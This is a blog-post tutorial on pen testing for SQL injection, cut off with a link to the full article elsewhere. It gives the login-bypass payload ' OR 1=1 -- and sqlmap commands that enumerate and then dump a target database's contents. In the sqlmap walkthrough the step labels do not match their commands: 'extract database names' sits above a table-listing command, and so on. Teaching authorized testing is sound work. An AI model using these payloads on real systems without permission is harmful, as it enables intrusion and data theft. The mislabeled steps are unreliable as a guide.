DEV Community

Cover image for 🖋️ Pen Testing SQL Injections
3a5abi 🥷
3a5abi 🥷

Posted on • Edited on • Originally published at devtoys.io

🖋️ Pen Testing SQL Injections

In today’s digital age, SQL injections remain a prevalent threat to database security. As businesses increasingly rely on data-driven applications, understanding how to protect against SQL injections is crucial. This article will guide you through the fundamentals of SQL injection pen testing, complete with practical examples to help bolster your cybersecurity measures.


What is SQL Injection?

SQL injection is a code injection technique that exploits vulnerabilities in an application’s software by inserting or “injecting” malicious SQL code. This code can manipulate the database, allowing attackers to bypass authentication, retrieve, alter, or delete data.


Why Pen Test for SQL Injections?

Penetration testing (pen testing) for SQL injections is vital to identify and mitigate potential vulnerabilities before they can be exploited. This proactive approach helps safeguard sensitive information and ensures the integrity of your database.


Preparing for a Pen Test

Before starting a pen test, it’s essential to have:


  • Legal Authorization: Ensure you have explicit permission to test the target system.
  • Testing Environment: Use a staging environment identical to the production setup.
  • Tools: Common tools include SQLMap, Burp Suite, and manual testing techniques.

Steps to Pen Test SQL Injections

1. Information Gathering

Start by understanding the application and identifying potential entry points. Common areas include:

  • Login forms
  • Search fields
  • URL parameters
  • User feedback forms

2. Identify Vulnerable Inputs

Use the following techniques to find vulnerable inputs:

  • Error-Based Injection: Inject single quotes (‘) to see if the application returns an SQL error.
  • Union-Based Injection: Use the UNION SQL operator to combine the results of two queries.
  • Boolean-Based Injection: Inject SQL code that returns different results based on a true or false condition.

Example:

For a login form with fields username and password, inject:

' OR 1=1 --
Enter fullscreen mode Exit fullscreen mode

If the application logs you in without valid credentials, it’s likely vulnerable.


3. Exploiting SQL Injections

Once a vulnerability is confirmed, craft specific payloads to extract data. Here’s a step-by-step example using SQLMap:

Step 1: Identify the target URL with a vulnerable parameter.

http://example.com/login?username=admin&password=admin
Enter fullscreen mode Exit fullscreen mode

Step 2: Run SQLMap against the URL.

sqlmap -u "http://example.com/login?username=admin&password=admin" --dbs
Enter fullscreen mode Exit fullscreen mode

Step 3: Extract database names.

sqlmap -u "http://example.com/login?username=admin&password=admin" -D target_db --tables
Enter fullscreen mode Exit fullscreen mode

Step 4: Extract table names.

sqlmap -u "http://example.com/login?username=admin&password=admin" -D target_db -T target_table --columns
Enter fullscreen mode Exit fullscreen mode

Step 5: Extract column names.

sqlmap -u "http://example.com/login?username=admin&password=admin" -D target_db -T target_table -C target_column --dump
Enter fullscreen mode Exit fullscreen mode

👀 To continue reading the full article visit ===> Pen Testing SQL Injections - DevToys.io

Top comments (0)